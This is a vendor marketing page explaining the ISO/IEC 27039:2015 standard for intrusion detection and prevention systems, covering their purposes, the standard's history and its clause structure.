ISO 27039

Book a demo

smiling,indian,businessman,working,on,laptop,in,modern,office,lobby

ISO 27039 details the selection, deployment and operations of intrusion detection and prevention systems (IDPS). We’re going to explore what that means.

What is ISO 27039?

ISO / IEC 27039:2015 provides recommendations to assist organisations in the implementation of intrusion detection and prevention (IDPS) systems. ISO 27039 outlines IDPS selection, implementation, and processes. The standard also offers context information for these guidelines. Detection and prevention of intrusion are two broad words defining practices used to prevent attacks and avoid new threats.

Detection of intrusions is a reactive measure that detects and mitigates ongoing threats using intrusion detection. It’s used to:

  • Detect malware (e.g. Trojans, backdoors, rootkits)
  • Detecting social engineering assaults manipulating users to expose confidential details (e.g. phishing)

Intrusion prevention is a proactive security measure using an intrusion prevention system to eliminate device attacks. That includes:

  • Remote file inclusions enabling malware injection,
  • SQL injections used to navigate company databases.

Well-designed, implemented, configured, controlled, and operated IDPS, like:

  • Automation optimises security professionals who would have to track, evaluate and react as best they can to network security incidents;
  • Automation tends to expedite identification and reaction to attacks, especially common types of attack that can be unambiguously identified via unique signatures;
  • They reassure management that security problems on networks and networked devices are detected and mitigated.

The standard has guidance and instructions on the implementation of an IDPS.

ISMS.online makes setting up and managing your ISMS as easy as it can get.

Peter Risdon
CISO, Viital

Book your demo

See our platform in action

What are intrusion detection and prevention systems?

Organisations shouldn’t just know what, where, and how their network, device, or programme was intruded. They should also know which the abused vulnerability and what precautions or implement effective risk treatments to avoid future issues.

Organisations can also identify and prevent cyber intrusions. This method involves an examination of network traffic and audit trails for known attacks or unique patterns that generally implies malicious intent. In the mid-1990s, companies started using intrusion detection and prevention (IDPS) systems to meet these needs.

The general use of IDPS continues to grow with a wider variety of IDPS devices being made available to meet a growing level of organisational requirements for sophisticated intrusion detection.

Intrusion Detection Systems are mostly automated systems that identify hackers’ attacks and intrusions into a network or device and raise the alarm. Intrusion prevention Systems take automation a stage further by automatically reacting to certain methods of identified attack, such as closing specific network ports, via a firewall, to block identified hacker traffic. IDPS refers to both types of this.

An Incident Detection System (IDS) is a hardware or software programme using known intrusion signatures to identify and analyse inbound and outbound network traffic for suspicious activities. An IDS achieves this by:

  • Comparing system files to malware signatures.
  • Scanning processes to identify dangerous patterns.
  • Track user actions for malicious intent.
  • Control device configurations and parameters.

Upon detecting a security breach, virus or configuration error, an IDS will kick an offending user off the network and send a warning to security personnel.

Despite its advantage, an IDS has inherent disadvantages. Since it uses established intrusion signatures to find attacks. Newly discovered or zero-day threats may remain undetected. An IDS detects only active attacks, not incoming assaults. An intrusion prevention system is needed to block these.

An Intrusion Prevention System (IPS) complements an IDS setup by proactively reviewing incoming traffic to avoid malicious requests. A standard IPS setup uses firewalls and traffic filtering solutions to protect applications.

An IPS avoids attacks by dropping malicious packets, blocking infringing IPs, and alerting security staff to risks. This device typically uses a pre-existing signature recognition database and can be designed to detect traffic-based attacks and behaviour irregularities.

Although effectively blocking known attack vectors, some IPS systems have limitations. These are usually induced by over-reliance on pre-defined laws, rendering them vulnerable to false positive.

The history of ISO/IEC 27039:2015

ISO released this standard in 2015. ISO 27039 was published as a replacement for ISO/IEC 18043:2006. In 2016, the technical corrigendum revised the description of the standard, reinstating the notably missing words “and prevention”.

ISO/IEC 18043:2006

ISO/IEC 18043:2006 issued guidelines to an enterprise that choose to provide intrusion detection in its IT infrastructure. It was a ‘how to’ for administrators and users who wanted:

  • To understand the costs and benefits of an IDS
  • To establish a policy and implementation plan for the IDS
  • To efficiently control the outputs of the IDS
  • To incorporate the monitoring of intrusions into the safety procedures of the organisation
  • To consider the legal and privacy concerns involved in the introduction of the IDS

ISO/IEC 18043:2006 provided information that helped promote cooperation between organisations using the IDS. The structure made it easier for organisations to share information on intrusions that cross organisational boundaries.

ISO/IEC 18043:2006 standard provided:

  • A brief description of the intrusion detection process
  • An explanation of what the IDS can and can not do
  • A checklist that helped to determine the best IDS features for a particular IT environment
  • A definition of different deployment strategies
  • Advice on managing IDS alerts
  • An explanation for management and legal concerns

Download your brochure

Transform your existing ISMS

Download your free guide
to streamlining your Infosec

Get your free guide

We started off using spreadsheets and it was a nightmare. With the ISMS.online solution, all the hard work was made easy.
Perry Bowles
Technical Director ZIPTECH
100% of our users pass certification first time
Book your demo

What are the benefits of ISO 27039?

Both systems have benefits and drawbacks. ISO 27039 contains specific information and guidance for the successful implementation and application of IDPSs for all organisations.

Fewer security incidents.

Although typically linked units do not notice any alteration, the IPS ensures less interference for organisations systems and fewer security incidents.

Logging selectively and protecting privacy

IPS only tracks network behaviour as it takes action, protecting network users’ privacy. IPS correlate network traffic with established malicious traffic but does not store or access the content.

Reputable managed security

The IPS adheres with a reputation-based list of suspected malicious sites and domains used proactively to secure the company. For example: If a member of staff clicks a connexion in a phishing email or a malware ad for a site on the IPS denylist of identified malicious sites, the system will block the traffic, and the employee would see a blank screen.

Multi-threat security

IPS offers zero-day attack protection, reduces brute force password attacks, and offers protection against risks to accessibility, such as DDoS and DoS attempts. For example, suppose a criminal tries to gain access to an account by brute force (e.g. repetitive login attempts). The IPS will track the scale of data movements, identify suspicious patterns, and deny access.

Dynamic response hazard

IPS identify and react to unique threats, enabling institutions to respond to defined threats to the company.

However, implementing an IDS has its own benefits. These benefits include:

  • Using the signature database, IDS ensures swift and efficient identification of identified anomalies with a low chance of false alarms.
  • It analyses various types of threats, detects trends of malicious content and helps administrators settle, manage and enforce adequate controls.
  • It helps ensure regulatory enforcement and comply with safety regulations as it offers greater visibility across the entire network.
  • While IDS is usually a passive device, while detecting and generating warnings, some active IDS can block IP addresses or prevent access to resources when an anomaly is detected.

Who can implement ISO 27039?

The ISO 27039 Standard helps organisations:

Trying to meet ISO 27001 requirements, specifically Annex A.16:

  • The organisation implements procedures and other measures capable of prompt identification and response to security incidents
  • To better detect attempted and successful security breaches and incidents, the company shall conduct monitoring and evaluation procedures and other controls

Trying to meet the following security objectives of ISO 27002

However, an organisation should understand that implementing IDPS is not a single or complete approach to resolve the requirements. Moreover, this International Standard also isn’t meant as guidelines for any compliance evaluation, such as ISMS certification.

Build the business case for your ISMS

Get your guide

Find out just how affordable your ISMS could be

ISO/IEC 27039:2015 Clauses

Clause 1: Scope

Clause 2: Terms and definitions

Clause 3: Background

Clause 4: General

Clause 5: Selection

  • 1 Introduction
  • 2 Information security risk assessment
  • 3 Host or Network IDPS
  • 4 Considerations
  • 5 Tools that complement IDPS5.6 Scalability
  • 7 Technical support
  • 8 Training

Clause 6: Deployment

  • 1 Overview
  • 2 Staged deployment
  • 3 NIDPS deployment
  • 4 HIDPS deployment
  • 5 Safeguarding and protecting IDPS information security

Clause 7: Operations

  • 1 Overview
  • 2 IDPS tuning
  • 3 IDPS vulnerabilities
  • 4 Handling IDPS alerts
  • 5 Response options
  • 6 Legal Considerations

ISO/IEC 27039:2015 requirements

ISO 27039 has seven clauses and one Annex.

Three main parts form the standard’s bulk:

  • Clause 5: IDPS range-different forms of IDPS, complementary resources etc. to be considered (detailed more in the Annex)
  • Clause 6: IDPS deployment
  • Clause 7: Activities for IDPS

ISO/IEC 27039:2015 Annex A Clauses

Annex A: Intrusion Detection and Prevention System (IDPS): Framework and issues to be considered

  • 1 Introduction to intrusion detection
  • 2 Types of intrusions and attacks
  • 3 Generic model of the intrusion detection process
  • 4 Types of IDPS
  • 5 Architecture
  • 6 Management of an IDPS

Explore other standards within the ISO 27k family

  • 1The ISO 27000 family
  • 2ISO 27002
  • 3ISO 27003
  • 4ISO 27004
  • 5ISO 27005
  • 6ISO 27008
  • 7ISO 27009
  • 8ISO 27010
  • 9ISO 27014
  • 11ISO 27013
  • 12ISO 27016
  • 13ISO 27017
  • 14ISO 27018
  • 15ISO 27019
  • 16ISO 27038
  • 17ISO 27039
  • 18ISO 27040
  • 19ISO 27050
  • 20ISO 27102

100% of our users achieve ISO 27001 certification first time

Start your journey today
See how we can help you

Explore ISMS.online's platform with a self-guided tour - Start Now